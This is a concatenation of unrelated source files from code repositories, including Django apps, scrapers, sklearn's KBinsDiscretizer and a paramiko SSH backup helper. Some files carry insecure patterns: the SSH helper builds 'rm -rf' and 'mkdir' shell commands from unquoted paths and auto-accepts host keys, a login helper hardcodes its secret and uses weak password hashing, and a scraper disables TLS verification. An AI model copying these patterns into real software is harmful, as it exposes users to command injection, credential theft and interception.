| 2023-05-27T10:04:14.408620 | 2023-04-28T18:16:48 | 2023-04-28T18:16:48 | 253,197,280 | 0 | 0 |
Apache-2.0
| 2020-04-05T09:22:41 | 2020-04-05T09:22:40 | null |
UTF-8
|
Python
| false | false | 772 |
py
|
from __future__ import print_function
import sys
sys.path.insert(1,"../../")
import h2o
import os
import tempfile
from tests import pyunit_utils
def generate_large_file(path, size):
with open(path, "wb") as f:
f.seek(size-1)
f.write(b"\0")
assert size == os.stat(path).st_size
def upload_large_file():
path = os.path.join(tempfile.mkdtemp(), "large.bin")
byte_size = 2 * 1024 * 1024 * 1024 + 1 # 2GB + 1 byte
generate_large_file(path, byte_size)
raw_data = h2o.api("POST /3/PostFile", filename=path)
print(raw_data)
assert raw_data["total_bytes"] == byte_size
h2o.remove(raw_data["destination_frame"])
if __name__ == "__main__":
pyunit_utils.standalone_test(upload_large_file)
else:
upload_large_file()
|
[
"[email protected]"
] | |
de725320a63af209519b9a5e0ee804c2715c38e2
|
d0efb8180b17f12f032716663e9202ed664af34b
|
/Pintrest-Board-Download-Python3.py
|
98a16854171b702a64701d8dfbf435b64b7c9df0
|
[] |
no_license
|
smjrifle/Pintrest-Board-Image-Downloader
|
d32dd7a645388aa8df46d59fe296693dc536ebca
|
9b15ee0e680a87c4e32c31f19d22f69e2f9099c2
|
refs/heads/master
| 2021-05-13T18:00:43.502937 | 2018-01-23T18:37:54 | 2018-01-23T18:37:54 | 116,846,587 | 1 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,267 |
py
|
URL_String=input("Please enter your Pinterest board url {https://www.pinterest.com/username/board-slug}: ")
from tkinter import filedialog
FOLDER_URL=filedialog.askdirectory(title="Select the folder where you want to save the images: ")
if FOLDER_URL=='':
print('Folder not selected')
exit(0)
from lxml import html
import requests
page=requests.get(URL_String)
print(page.status_code)
tree=html.fromstring(page.content)
print(tree)
pins=tree.xpath('//div[@class="GrowthUnauthPinImage"]//@href')
import requests, bs4
import urllib
print("Pin from board " + URL_String + " will be saved on " + FOLDER_URL)
print("Array of pins in board")
print(pins)
print("Total number of pins " + str(len(pins)))
n=1
for pin in pins:
print("Saving Image Number: " + str(n))
page=requests.get('http://www.pinterest.com'+pin)
print("Pin " + pin + " processed")
page_soup=bs4.BeautifulSoup(page.text,"lxml")
page_element=page_soup.select('img[src]')
image_address=page_element[0].attrs['src']
image_title = page_element[0].attrs['alt']
if len(image_title) < 2:
image_title=str(n)
resource=urllib.request.urlopen(image_address)
output=open(FOLDER_URL+"/"+"Pin"+image_title[:50]+".jpg","wb")
output.write(resource.read())
output.close()
n=n+1
|
[
"[email protected]"
] | |
70705d415f9f7e79293d2c40ed2115e5e1caff7c
|
149f3e5d26d9e6428a7d136e9753cae9d87afdb3
|
/mfscrm/crm/urls.py
|
8c71bd74590ba6aef890e41086bc945950a4e961
|
[] |
no_license
|
bpeightal/MavFoodService
|
d628417b4ab2745008665dfc904c79c516c92b1d
|
df49b9147639e41194791ae8e4b2ae46e0610d01
|
refs/heads/master
| 2020-06-21T23:24:27.059553 | 2019-07-18T14:43:28 | 2019-07-18T14:43:28 | 197,577,208 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,113 |
py
|
from django.conf.urls import url
from . import views
from django.urls import path, re_path
app_name = 'crm'
urlpatterns = [
path('', views.home, name='home'),
re_path(r'^home/$', views.home, name='home'),
path('customer/<int:pk>/summary/', views.summary, name='summary'),
path('service/<int:pk>/edit/', views.service_edit, name='service_edit'),
path('service/create/', views.service_new, name='service_new'),
path('service_list', views.service_list, name='service_list'),
path('service/<int:pk>/delete/', views.service_delete, name='service_delete'),
path('customer_list', views.customer_list, name='customer_list'),
path('customer/<int:pk>/edit/', views.customer_edit, name='customer_edit'),
path('customer/<int:pk>/delete/', views.customer_delete, name='customer_delete'),
path('product/<int:pk>/edit/', views.product_edit, name='product_edit'),
path('product/create/', views.product_new, name='product_new'),
path('product_list', views.product_list, name='product_list'),
path('product/<int:pk>/delete/', views.product_delete, name='product_delete'),
]
|
[
"[email protected]"
] | |
2988550f0019d72b5c3f9fc7a35abca539069ed6
|
e54c41eafc5132aba7dcfb62dae1a456e6065ad7
|
/parse_station.py
|
5192b302992adbcd09aa04068a84ec68a5dc1aee
|
[] |
no_license
|
YJGit/12306-tools
|
69c3a3916fe5e7963955932d68a8958e4cb3be67
|
c5cfd3bba17806b0842b6fce088ccda1b68acb89
|
refs/heads/master
| 2021-05-12T06:03:25.961160 | 2018-01-12T08:27:09 | 2018-01-12T08:27:09 | 117,208,903 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 471 |
py
|
import re
import requests
from pprint import pprint
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
url = 'https://kyfw.12306.cn/otn/resources/js/framework/station_name.js?station_version=1.9028'
response = requests.get(url, verify=False)
stations = re.findall(u'([\u4e00-\u9fa5]+)\|([A-Z]+)', response.text)
with open("stations.py", "w", encoding="utf-8") as fout:
pprint(dict(stations), fout, indent=4)
print("get stations ok!")
|
[
"[email protected]"
] | |
ba3339eeda813a3c7d315fcb1cb1c530a8080125
|
d094ba0c8a9b1217fbf014aa79a283a49aabe88c
|
/env/lib/python3.6/site-packages/sklearn/preprocessing/_discretization.py
|
7b26ce916e1893d6d13fc02304699fa07bd412b3
|
[
"Apache-2.0"
] |
permissive
|
Raniac/NEURO-LEARN
|
d9274e0baadd97bb02da54bdfcf6ca091fc1c703
|
3c3acc55de8ba741e673063378e6cbaf10b64c7a
|
refs/heads/master
| 2022-12-25T23:46:54.922237 | 2020-09-06T03:15:14 | 2020-09-06T03:15:14 | 182,013,100 | 9 | 2 |
Apache-2.0
| 2022-12-09T21:01:00 | 2019-04-18T03:57:00 |
CSS
|
UTF-8
|
Python
| false | false | 12,083 |
py
|
# -*- coding: utf-8 -*-
# Author: Henry Lin <[email protected]>
# Tom Dupré la Tour
# License: BSD
from __future__ import division, absolute_import
import numbers
import numpy as np
import warnings
from . import OneHotEncoder
from ..base import BaseEstimator, TransformerMixin
from ..utils.validation import check_array
from ..utils.validation import check_is_fitted
from ..utils.validation import FLOAT_DTYPES
from ..utils.fixes import np_version
class KBinsDiscretizer(BaseEstimator, TransformerMixin):
"""Bin continuous data into intervals.
Read more in the :ref:`User Guide <preprocessing_discretization>`.
Parameters
----------
n_bins : int or array-like, shape (n_features,) (default=5)
The number of bins to produce. Raises ValueError if ``n_bins < 2``.
encode : {'onehot', 'onehot-dense', 'ordinal'}, (default='onehot')
Method used to encode the transformed result.
onehot
Encode the transformed result with one-hot encoding
and return a sparse matrix. Ignored features are always
stacked to the right.
onehot-dense
Encode the transformed result with one-hot encoding
and return a dense array. Ignored features are always
stacked to the right.
ordinal
Return the bin identifier encoded as an integer value.
strategy : {'uniform', 'quantile', 'kmeans'}, (default='quantile')
Strategy used to define the widths of the bins.
uniform
All bins in each feature have identical widths.
quantile
All bins in each feature have the same number of points.
kmeans
Values in each bin have the same nearest center of a 1D k-means
cluster.
Attributes
----------
n_bins_ : int array, shape (n_features,)
Number of bins per feature. Bins whose width are too small
(i.e., <= 1e-8) are removed with a warning.
bin_edges_ : array of arrays, shape (n_features, )
The edges of each bin. Contain arrays of varying shapes ``(n_bins_, )``
Ignored features will have empty arrays.
Examples
--------
>>> X = [[-2, 1, -4, -1],
... [-1, 2, -3, -0.5],
... [ 0, 3, -2, 0.5],
... [ 1, 4, -1, 2]]
>>> est = KBinsDiscretizer(n_bins=3, encode='ordinal', strategy='uniform')
>>> est.fit(X) # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
KBinsDiscretizer(...)
>>> Xt = est.transform(X)
>>> Xt # doctest: +SKIP
array([[ 0., 0., 0., 0.],
[ 1., 1., 1., 0.],
[ 2., 2., 2., 1.],
[ 2., 2., 2., 2.]])
Sometimes it may be useful to convert the data back into the original
feature space. The ``inverse_transform`` function converts the binned
data into the original feature space. Each value will be equal to the mean
of the two bin edges.
>>> est.bin_edges_[0]
array([-2., -1., 0., 1.])
>>> est.inverse_transform(Xt)
array([[-1.5, 1.5, -3.5, -0.5],
[-0.5, 2.5, -2.5, -0.5],
[ 0.5, 3.5, -1.5, 0.5],
[ 0.5, 3.5, -1.5, 1.5]])
Notes
-----
In bin edges for feature ``i``, the first and last values are used only for
``inverse_transform``. During transform, bin edges are extended to::
np.concatenate([-np.inf, bin_edges_[i][1:-1], np.inf])
You can combine ``KBinsDiscretizer`` with
:class:`sklearn.compose.ColumnTransformer` if you only want to preprocess
part of the features.
``KBinsDiscretizer`` might produce constant features (e.g., when
``encode = 'onehot'`` and certain bins do not contain any data).
These features can be removed with feature selection algorithms
(e.g., :class:`sklearn.feature_selection.VarianceThreshold`).
See also
--------
sklearn.preprocessing.Binarizer : class used to bin values as ``0`` or
``1`` based on a parameter ``threshold``.
"""
def __init__(self, n_bins=5, encode='onehot', strategy='quantile'):
self.n_bins = n_bins
self.encode = encode
self.strategy = strategy
def fit(self, X, y=None):
"""Fits the estimator.
Parameters
----------
X : numeric array-like, shape (n_samples, n_features)
Data to be discretized.
y : ignored
Returns
-------
self
"""
X = check_array(X, dtype='numeric')
valid_encode = ('onehot', 'onehot-dense', 'ordinal')
if self.encode not in valid_encode:
raise ValueError("Valid options for 'encode' are {}. "
"Got encode={!r} instead."
.format(valid_encode, self.encode))
valid_strategy = ('uniform', 'quantile', 'kmeans')
if self.strategy not in valid_strategy:
raise ValueError("Valid options for 'strategy' are {}. "
"Got strategy={!r} instead."
.format(valid_strategy, self.strategy))
n_features = X.shape[1]
n_bins = self._validate_n_bins(n_features)
bin_edges = np.zeros(n_features, dtype=object)
for jj in range(n_features):
column = X[:, jj]
col_min, col_max = column.min(), column.max()
if col_min == col_max:
warnings.warn("Feature %d is constant and will be "
"replaced with 0." % jj)
n_bins[jj] = 1
bin_edges[jj] = np.array([-np.inf, np.inf])
continue
if self.strategy == 'uniform':
bin_edges[jj] = np.linspace(col_min, col_max, n_bins[jj] + 1)
elif self.strategy == 'quantile':
quantiles = np.linspace(0, 100, n_bins[jj] + 1)
if np_version < (1, 9):
quantiles = list(quantiles)
bin_edges[jj] = np.asarray(np.percentile(column, quantiles))
elif self.strategy == 'kmeans':
from ..cluster import KMeans # fixes import loops
# Deterministic initialization with uniform spacing
uniform_edges = np.linspace(col_min, col_max, n_bins[jj] + 1)
init = (uniform_edges[1:] + uniform_edges[:-1])[:, None] * 0.5
# 1D k-means procedure
km = KMeans(n_clusters=n_bins[jj], init=init, n_init=1)
centers = km.fit(column[:, None]).cluster_centers_[:, 0]
# Must sort, centers may be unsorted even with sorted init
centers.sort()
bin_edges[jj] = (centers[1:] + centers[:-1]) * 0.5
bin_edges[jj] = np.r_[col_min, bin_edges[jj], col_max]
# Remove bins whose width are too small (i.e., <= 1e-8)
if self.strategy in ('quantile', 'kmeans'):
mask = np.ediff1d(bin_edges[jj], to_begin=np.inf) > 1e-8
bin_edges[jj] = bin_edges[jj][mask]
if len(bin_edges[jj]) - 1 != n_bins[jj]:
warnings.warn('Bins whose width are too small (i.e., <= '
'1e-8) in feature %d are removed. Consider '
'decreasing the number of bins.' % jj)
n_bins[jj] = len(bin_edges[jj]) - 1
self.bin_edges_ = bin_edges
self.n_bins_ = n_bins
if 'onehot' in self.encode:
self._encoder = OneHotEncoder(
categories=[np.arange(i) for i in self.n_bins_],
sparse=self.encode == 'onehot')
# Fit the OneHotEncoder with toy datasets
# so that it's ready for use after the KBinsDiscretizer is fitted
self._encoder.fit(np.zeros((1, len(self.n_bins_)), dtype=int))
return self
def _validate_n_bins(self, n_features):
"""Returns n_bins_, the number of bins per feature.
"""
orig_bins = self.n_bins
if isinstance(orig_bins, numbers.Number):
if not isinstance(orig_bins, (numbers.Integral, np.integer)):
raise ValueError("{} received an invalid n_bins type. "
"Received {}, expected int."
.format(KBinsDiscretizer.__name__,
type(orig_bins).__name__))
if orig_bins < 2:
raise ValueError("{} received an invalid number "
"of bins. Received {}, expected at least 2."
.format(KBinsDiscretizer.__name__, orig_bins))
return np.full(n_features, orig_bins, dtype=np.int)
n_bins = check_array(orig_bins, dtype=np.int, copy=True,
ensure_2d=False)
if n_bins.ndim > 1 or n_bins.shape[0] != n_features:
raise ValueError("n_bins must be a scalar or array "
"of shape (n_features,).")
bad_nbins_value = (n_bins < 2) | (n_bins != orig_bins)
violating_indices = np.where(bad_nbins_value)[0]
if violating_indices.shape[0] > 0:
indices = ", ".join(str(i) for i in violating_indices)
raise ValueError("{} received an invalid number "
"of bins at indices {}. Number of bins "
"must be at least 2, and must be an int."
.format(KBinsDiscretizer.__name__, indices))
return n_bins
def transform(self, X):
"""Discretizes the data.
Parameters
----------
X : numeric array-like, shape (n_samples, n_features)
Data to be discretized.
Returns
-------
Xt : numeric array-like or sparse matrix
Data in the binned space.
"""
check_is_fitted(self, ["bin_edges_"])
Xt = check_array(X, copy=True, dtype=FLOAT_DTYPES)
n_features = self.n_bins_.shape[0]
if Xt.shape[1] != n_features:
raise ValueError("Incorrect number of features. Expecting {}, "
"received {}.".format(n_features, Xt.shape[1]))
bin_edges = self.bin_edges_
for jj in range(Xt.shape[1]):
# Values which are close to a bin edge are susceptible to numeric
# instability. Add eps to X so these values are binned correctly
# with respect to their decimal truncation. See documentation of
# numpy.isclose for an explanation of ``rtol`` and ``atol``.
rtol = 1.e-5
atol = 1.e-8
eps = atol + rtol * np.abs(Xt[:, jj])
Xt[:, jj] = np.digitize(Xt[:, jj] + eps, bin_edges[jj][1:])
np.clip(Xt, 0, self.n_bins_ - 1, out=Xt)
if self.encode == 'ordinal':
return Xt
return self._encoder.transform(Xt)
def inverse_transform(self, Xt):
"""Transforms discretized data back to original feature space.
Note that this function does not regenerate the original data
due to discretization rounding.
Parameters
----------
Xt : numeric array-like, shape (n_sample, n_features)
Transformed data in the binned space.
Returns
-------
Xinv : numeric array-like
Data in the original feature space.
"""
check_is_fitted(self, ["bin_edges_"])
if 'onehot' in self.encode:
Xt = self._encoder.inverse_transform(Xt)
Xinv = check_array(Xt, copy=True, dtype=FLOAT_DTYPES)
n_features = self.n_bins_.shape[0]
if Xinv.shape[1] != n_features:
raise ValueError("Incorrect number of features. Expecting {}, "
"received {}.".format(n_features, Xinv.shape[1]))
for jj in range(n_features):
bin_edges = self.bin_edges_[jj]
bin_centers = (bin_edges[1:] + bin_edges[:-1]) * 0.5
Xinv[:, jj] = bin_centers[np.int_(Xinv[:, jj])]
return Xinv
|
[
"[email protected]"
] | |
fcf372ccfafa7ce16d3ec5744829c5fc40edd1be
|
3c33d89e127d3f04b4232f22361919ce1f95e2e6
|
/ngremote.py
|
ce6aa4445bed5349f64efb80a0947b5f41443f5b
|
[] |
no_license
|
kaevee/NgBackup
|
1277a4e6802a5b3b65481fa7017b51da03d035b6
|
2f3ec00f2374b5f4dd196425c57abff596954582
|
refs/heads/main
| 2023-08-24T00:52:10.107383 | 2021-09-28T03:13:16 | 2021-09-28T03:13:16 | 409,851,971 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,766 |
py
|
from pathlib import Path
import paramiko
from paramiko import transport
from paramiko.client import AutoAddPolicy, SSHClient
from paramiko.rsakey import RSAKey
from paramiko.ssh_exception import AuthenticationException, BadHostKeyException, SSHException
import logging
class NgRemote:
host: str
user: str
port: int
private_key: RSAKey
__ssh_client: SSHClient
logger: logging.Logger
def __init__(self, host: str, port: int, user: str, ssh_key_path: Path) -> None:
self.private_key = paramiko.RSAKey.from_private_key_file(ssh_key_path.as_posix())
self.host = host
self.user = user
self.port = port
self.__ssh_client = SSHClient()
self.__ssh_client.set_missing_host_key_policy(AutoAddPolicy())
self.logger = logging.getLogger(f"NgBackup.NgRemote.{self.user}_{self.host}")
def connect(self):
try:
self.__ssh_client.connect(hostname=self.host, port=self.port, username=self.user, pkey=self.private_key)
self.logger.log(logging.INFO, "Connected successfully")
except AuthenticationException as ae:
self.logger.log(logging.ERROR, "Connect: %s", ae)
except BadHostKeyException as bh:
self.logger.log(logging.ERROR, "Connect: %s", bh)
except SSHException as se:
self.logger.log(logging.ERROR, "Connect: %s", se)
except Exception as ex:
self.logger.log(logging.ERROR, "Connect: %s", ex)
def close(self):
try:
self.__ssh_client.close()
except Exception as ex:
self.logger.log(logging.ERROR, "Exception raied when remote connection is closed")
def check_status(self):
transport = self.__ssh_client.get_transport()
if transport and transport.is_active():
return True
else:
return False
@property
def is_alive(self) -> bool:
return self.check_status()
def exists(self, path: Path) -> bool:
transport = self.__ssh_client.get_transport()
sftp = paramiko.SFTPClient.from_transport(transport)
try:
sftp.stat(path.as_posix())
return True
except FileNotFoundError as ex:
return False
except Exception as ex:
self.logger.log(logging.ERROR, "Failed to list the path %s", path.as_posix())
return False
def listdir(self, path: Path) -> list[Path]:
transport = self.__ssh_client.get_transport()
sftp = paramiko.SFTPClient.from_transport(transport)
try:
entries = sorted(sftp.listdir(path.as_posix()))
increments: list[Path] = []
for entry in entries:
p = path / entry
increments.insert(len(increments), p)
return increments
except Exception as ex:
self.logger.log(logging.ERROR, "Exception raised while listing files at %s", path.as_posix())
return None
def makedirs(self, path: Path) -> bool:
try:
stdin, stdout, stderr = self.__ssh_client.exec_command(f"mkdir -p {path.as_posix()}")
return True
except Exception as Ex:
self.logger.log(logging.ERROR, "Exception raised while creating directory %s", path.as_posix())
return False
def makedirs_old(self, path: Path) -> bool:
transport = self.__ssh_client.get_transport()
sftp = paramiko.SFTPClient.from_transport(transport)
try:
sftp.mkdir(path.as_posix())
return True
except:
self.logger.log(logging.ERROR, "Exception raised when creating directory %s", path.as_posix())
return False
def rename(self, src_path: Path, dest_path: Path):
transport = self.__ssh_client.get_transport()
sftp = paramiko.SFTPClient.from_transport(transport)
try:
sftp.rename(src_path.as_posix(), dest_path.as_posix())
return True
except Exception as ex:
self.logger.log(logging.ERROR, "Exception raised while renaming %s to %s", src_path.as_posix(), dest_path.as_posix())
return False
def rmtree(self, path: Path) -> bool:
cmd = f"rm -rf {path.as_posix()}"
try:
stdin, stdout, stderr = self.__ssh_client.exec_command(cmd)
if stderr.read().decode('utf8') == '':
return True
else:
self.logger.log(logging.ERROR, stderr.read().decode('utf8'))
return False
except Exception as ex:
self.logger.log(logging.ERROR, "Failed to delete path %s", path.as_posix())
return False
|
[
"[email protected]"
] | |
c9538de673b65c0b29c54571c0b7394ae9b9485a
|
b772c1bfdf94886d06505a29053d8ff419f5b99f
|
/estudiantes/migrations/0001_initial.py
|
c379140b99b3a9a307d628b6c27a7c08cd091790
|
[] |
no_license
|
dehivix/bot_algoritmos
|
54dfda89e1216559646eb92a6d176c06af40cec3
|
e9be630b4f771aab4ac3fa262888a1b677063849
|
refs/heads/master
| 2022-02-10T05:18:38.506667 | 2016-05-08T20:20:31 | 2016-05-08T20:20:31 | 43,855,581 | 1 | 0 | null | 2022-01-21T19:00:33 | 2015-10-08T01:43:12 |
Python
|
UTF-8
|
Python
| false | false | 1,687 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-05-06 22:27
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Estudiantes',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('cedula', models.CharField(max_length=50, unique=True, verbose_name='N\xfamero de Identificaci\xf3n')),
('apellido', models.CharField(max_length=100)),
('nombre', models.CharField(max_length=100)),
],
options={
'db_table': 'estudiantes',
'verbose_name_plural': 'estudiantes',
},
),
migrations.CreateModel(
name='Seccion',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nombre', models.CharField(max_length=100)),
('asignatura', models.CharField(max_length=100)),
('codigo', models.CharField(blank=True, max_length=10, null=True)),
],
options={
'db_table': 'secciones',
'verbose_name_plural': 'secciones',
},
),
migrations.AddField(
model_name='estudiantes',
name='seccion',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='estudiantes.Seccion'),
),
]
|
[
"[email protected]"
] | |
d891dab2b005529ae77978248f4f5b948a30095b
|
87062d04d0de4effcd76ff88b80906da582a0be9
|
/project3/app/login_helper.py
|
95d5af2e8b263e05674fc3a85fb6c7211212251c
|
[] |
no_license
|
ohheydom/udacity_projects
|
16fedb4cc490a6884109a568c7d3620a71167af5
|
b795891f558e782b4092a49602039c5f209024ac
|
refs/heads/master
| 2021-01-10T23:04:06.959236 | 2016-10-31T14:30:42 | 2016-10-31T14:30:42 | 70,427,820 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 810 |
py
|
import hmac
import string
import random
import hashlib
SECRET = '?e@7[!{+w$)W<s4Z)ENTzfWZ-K#fK.LR'
# Hashing helper methods
def build_salt(length=5):
return ''.join(random.choice(string.letters) for _ in xrange(length))
def build_password_hash(username, password, salt=None):
if not salt:
salt = build_salt()
h = hashlib.sha256(username + password + salt).hexdigest()
return '{},{}'.format(salt, h)
def valid_password(username, password, h):
salt = h.split(',')[0]
return h == build_password_hash(username, password, salt)
# Cookie helper methods
def build_secure_val(val):
return '{}|{}'.format(val, hmac.new(SECRET, val).hexdigest())
def check_secure_val(secure_val):
val = secure_val.split('|')[0]
if build_secure_val(val) == secure_val:
return val
|
[
"[email protected]"
] | |
ad6f6960cdbbc6c8f57b0490e1f141715f7b7a79
|
d7f8e70d67442463c221c8f011b9e5bfa36b2aaa
|
/student_api/models.py
|
fb33d301fe793ef806bb48e1b95013a73398e5b0
|
[] |
no_license
|
BipinKalra/StudentAPI_Django
|
ea8484912ce4dc486c8c1a75ddc5c9424c4f31bc
|
f54ec45a159a21cc0aa8474b04d72c8b338d63d7
|
refs/heads/master
| 2022-05-03T04:25:13.311212 | 2019-09-09T17:01:52 | 2019-09-09T17:01:52 | 207,360,996 | 0 | 0 | null | 2022-04-22T22:18:57 | 2019-09-09T17:03:37 |
Python
|
UTF-8
|
Python
| false | false | 1,065 |
py
|
from django.db import models
from django.core.validators import (
MaxValueValidator,
MinValueValidator
)
# Create your models here.
class Student(models.Model):
GENDERS = (
("f", "female"),
("m", "male"),
("u", "Undisclosed")
)
name = models.CharField(max_length = 100)
roll_number = models.IntegerField(unique = True)
email = models.EmailField(max_length = 100, null = True)
gender = models.CharField(max_length = 1, choices = GENDERS, null = True)
percentage = models.FloatField()
age = models.IntegerField(
null = True,
validators = [
MaxValueValidator(100),
MinValueValidator(5)
]
)
institute = models.ForeignKey("Institute", on_delete = models.CASCADE, null = True, blank = True)
def __str__(self):
return self.name
class Institute(models.Model):
TYPES = (
("h", "High School"),
("c", "College")
)
name = models.CharField(max_length = 200)
type_of_institute = models.CharField(max_length = 1, choices = TYPES, null = True)
def __str__(self):
return self.name
|
[
"[email protected]"
] | |
f841a6d78d2ca8e726c6e9843c80a73b250420e9
|
27c53a4ae22c17a2bed24ed0b4d46583b8feff64
|
/numpy_exercise.py
|
97ecab6f660314df8d56eceb899b67638388bfe3
|
[] |
no_license
|
yscho224/numpy
|
5ccc4f5bfdc75a395bc1e2ac67310ba32a68b2ab
|
eb336a5379c1bd578943316ac23949ca00b75009
|
refs/heads/main
| 2022-12-19T18:35:23.107858 | 2020-10-07T06:47:30 | 2020-10-07T06:47:30 | 301,658,830 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 553 |
py
|
'''
use NumPy random-number generation to create an array of
twelve random grades in the range 60 through 100, then
reshape the result into a 3-by-4 array. Calculate the average
of all the grades, the averages of the grades for each test
and the averages of the grades for each student.
'''
import numpy as np
import random
grades = np.random.randint(60, 101, 12).reshape(3,4)
print(grades)
print('All grades', grades.mean())
print("AVG by each test", grades.mean(axis = 0))
print("AVG by each student", grades.mean(axis = 1))
|
[
"[email protected]"
] | |
d0028651862455ad29cc5783753b1f241f679938
|
4d7fd59810aad8bd63bbf8fcc2dbb1158009bdd0
|
/comprehensions-2020-05-18_13-22-57-956.py
|
a8e7d5a62a8a2b3bfbf8b8b8fcda4edc80c1151a
|
[] |
no_license
|
doughbuoy/learning_python
|
0346ffd97c310a9bd4fec69c2d5958fb0fc71dcc
|
36816c2cb024b60366c5df0d4bf6e11d142e7ece
|
refs/heads/master
| 2022-12-04T05:57:44.301124 | 2020-08-28T00:44:41 | 2020-08-28T00:44:41 | 259,989,146 | 0 | 0 | null | 2020-08-28T00:44:43 | 2020-04-29T17:05:10 |
Python
|
UTF-8
|
Python
| false | false | 1,076 |
py
|
words = "On a dark desert highway Cool wind in my hair Warm smell of colitas Rising up through the air".split()
lengths = [len(word) for word in words]
print(words)
print(lengths)
# ALTERNATIVLY
lengths2 = []
for item in words:
lengths2.append(len(item))
print(lengths2)
from math import factorial
# creates a list of the factorals of valies 1 to 19
f = [len(str(factorial(x))) for x in range(20)]
print(f"F contains:{f}")
print(f" F is of type {type(f)} ")
g = {len(str(factorial(x))) for x in range(20) }
print(f"g contains:{g}")
print(f" G is of type {type(g)} Note DUPES are eliminated")
colors2code = { 'WHITE':'#FFFFFF',
'SILVER':'#C0C0C0',
'GRAY':'#808080',
'BLACK':'#000000',
'RED':'#FF0000',
'MAROON':'#800000',
'YELLOW':'#FFFF00',
'OLIVE':'#808000',
'LIME':'#00FF00',
'GREEN':'#008000',
'AQUA':'#00FFFF',
'TEAL':'#008080',
'BLUE':'#0000FF',
'NAVY':'#000080',
'FUCHSIA':'#FF00FF',
'PURPLE':'#800080',
}
code2color = {color:code for color, code in colors2code.items()}
print(f"g contains:{g}")
print(f" G is of type {type(g)} Note DUPES are eliminated")
|
[
"[email protected]"
] | |
04b349165621c8e2ed4e9273c7f99f5570861329
|
1019c1afd3b8c4be7d1870499d3803a820a51f76
|
/nbayes/nbayes/urls.py
|
d1f8555cf8d60a30ad50c51ecfd5193e25aafd5e
|
[] |
no_license
|
shunshun0904/django-apps
|
6f628ae02c0c3bb07eedd456f97d59787e7a7144
|
93e5851619a42eb90208ec3c1696aaa9b91f360b
|
refs/heads/master
| 2021-01-22T00:29:14.209775 | 2017-10-17T16:17:21 | 2017-10-17T16:17:21 | 102,188,772 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 793 |
py
|
"""nbayes URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url
from django.contrib import admin
from test1.views import kakikomi
urlpatterns = [
url(r'^kakikomi/', kakikomi),
]
|
[
"[email protected]"
] | |
c4bbdfd24d7948656571bd51d3470a828aa2441a
|
7343ddd703134c47bdbc0ee2dcf438c35aac580a
|
/python_for_image_processing_APEER-master/python_for_image_processing_APEER-master/tutorial35_denoising_using_NLM.py
|
a1fe4dcf62f82620cd4483e964207ba7b8c81af6
|
[] |
no_license
|
MohamedMehery/Computer-vision-tutorial
|
a3686f8ca671e237cf87e717dfd6a8db9664c060
|
f25737b7d114ed63c6783a983fb82674f94fd14c
|
refs/heads/master
| 2023-01-01T15:58:02.439220 | 2020-10-17T11:37:39 | 2020-10-17T11:37:39 | 296,582,526 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,723 |
py
|
#Video Playlist: https://www.youtube.com/playlist?list=PLHae9ggVvqPgyRQQOtENr6hK0m1UquGaG
"""
https://scikit-image.org/docs/dev/auto_examples/filters/plot_nonlocal_means.html
Works well for random gaussian noise but not as good for salt and pepper
https://www.iro.umontreal.ca/~mignotte/IFT6150/Articles/Buades-NonLocal.pdf
The non-local means algorithm replaces the value of a pixel by an average
of a selection of other pixels values: small patches centered on the other
pixels are compared to the patch centered on the pixel of interest, and the
average is performed only for pixels that have patches close to the current patch.
"""
import cv2
import numpy as np
from skimage import io, img_as_float
from skimage.restoration import denoise_nl_means, estimate_sigma
img_gaussian_noise = img_as_float(io.imread('images/Osteosarcoma_01_25Sigma_noise.tif', as_gray=True))
img_salt_pepper_noise = img_as_float(io.imread('images/Osteosarcoma_01_8bit_salt_pepper.tif', as_gray=True))
img = img_gaussian_noise
sigma_est = np.mean(estimate_sigma(img, multichannel=True))
#sigma_est = 0.1
denoise_img = denoise_nl_means(img, h=1.15 * sigma_est, fast_mode=True,
patch_size=5, patch_distance=3, multichannel=False)
"""
When the fast_mode argument is False, a spatial Gaussian weighting is applied
to the patches when computing patch distances. When fast_mode is True a
faster algorithm employing uniform spatial weighting on the patches is applied.
Larger h allows more smoothing between disimilar patches.
"""
#denoise_img_as_8byte = img_as_ubyte(denoise_img)
cv2.imshow("Original", img)
cv2.imshow("NLM Filtered", denoise_img)
cv2.waitKey(0)
cv2.destroyAllWindows()
|
[
"[email protected]"
] | |
7d791803bd7703cce697c0a6fd02403ea830a060
|
e807fe527f6d763bf3dd260f3aa713c13b9c7123
|
/src/python/procyon/dump.py
|
cc2c72e0badd1f677fc06345d52680ed9178d640
|
[
"Apache-2.0"
] |
permissive
|
orbea/procyon
|
082623058b7fcf18911756dded3f6894776a0062
|
469d94427d3b6e7cc2ab93606bdf968717a49150
|
refs/heads/master
| 2020-12-07T05:53:43.607616 | 2019-07-18T14:59:34 | 2019-07-18T14:59:34 | 232,649,374 | 0 | 0 |
Apache-2.0
| 2020-01-08T20:10:20 | 2020-01-08T20:10:19 | null |
UTF-8
|
Python
| false | false | 15,928 |
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2017 The Procyon Authors
#
